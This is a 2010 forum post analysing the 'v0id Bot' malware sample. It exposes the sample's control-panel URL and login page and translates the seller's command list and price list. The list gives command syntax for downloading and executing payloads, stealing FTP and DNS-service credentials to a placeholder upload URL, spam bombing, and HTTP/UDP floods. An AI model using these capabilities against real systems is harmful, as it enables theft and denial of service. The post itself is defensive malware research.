Author Topic: v0id Bot  (Read 3748 times)

0 Members and 1 Guest are viewing this topic.

March 03, 2010, 08:37:02 am
Read 3748 times

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Yesterday a malware researcher asked me what this sample does.

http://www.virustotal.com/analisis/ec295ccdc2f03cc642a57b60bf1340fcc3ec2b8ecb61b0ee648c9b3bb6af7427-1267604113

It is a .NET application. Online analysis services don't show any malicious activity.

Looking at the string inside the file reveals an url.

Code: [Select]
nexus88.scene-hosting.info/bot/
It is a control panel for something called "v0id Bot".

Quote
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>v0id Bot ::: Login</title>
<link href="css/main.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="main">
<center><p class="caption">Login</p>
<form action="index.php" method="post">

  <p class="text-norm">
    <label> Username</label>
    <br />
    <input class="txtdborder" type="text" name="user" tabindex="1" />
    <br />
    <label>Password</label>
    <br />
    <input class="txtdborder" type="password" name="pw" tabindex="2" />
    <br />
    <br /> 
    <input class="btndoubleborder" type="submit" name="submit" id="submit" value="Absenden" tabindex="3" />
  </p>
</form><br />

  <p class="named">Design and Code by RedShark</p>
  </center>
  </div>
</body>
</html>

But what is "v0id Bot" ? Googling for the name returns this result.

Code: [Select]
http://tool-store.info/?page_id=52
It seems to be a new bot and has probably German origin.









Here is translation of the function list:

(+) stop bot -> specific bot -> [end] pcname
(+) stop all bots                -> [endall]
(+) open website (hidden)  -> [run] www.google.de number
(+) open website (hidden)  -> [visit] www.google.de number
(+) download & execute     -> [dl] www.server.com/serv.exe 1 (1=execute 0=download only)
(+) switch to host until next reboot  -> [host] website
(+) display computername   -> [pcname]
(+) e-mail spam/bombing    -> [spam] youremail@mail.ru victim@mail.ru Subject Body SMTP PORT Mailpass
(+) stealer (No-ip,DynDns & Filezilla) -> [steal] yourwebsite.com/send.php
(+) HTTP Flood                   -> [http] www.google.de intervalinms threads
(+) UDP Flood                    -> [udp] host port threads sockets

Price:

v0id Bot Builder FUD = 10 PSC
v0id Bot Builder FUD + 2 FUD Stubs Update = 20 PSC
Gold -> v0id Bot Builder FUD + Unlimited FUD Stubs + Support = 50 PSC

Contact: 560281951
Ruining the bad guy's day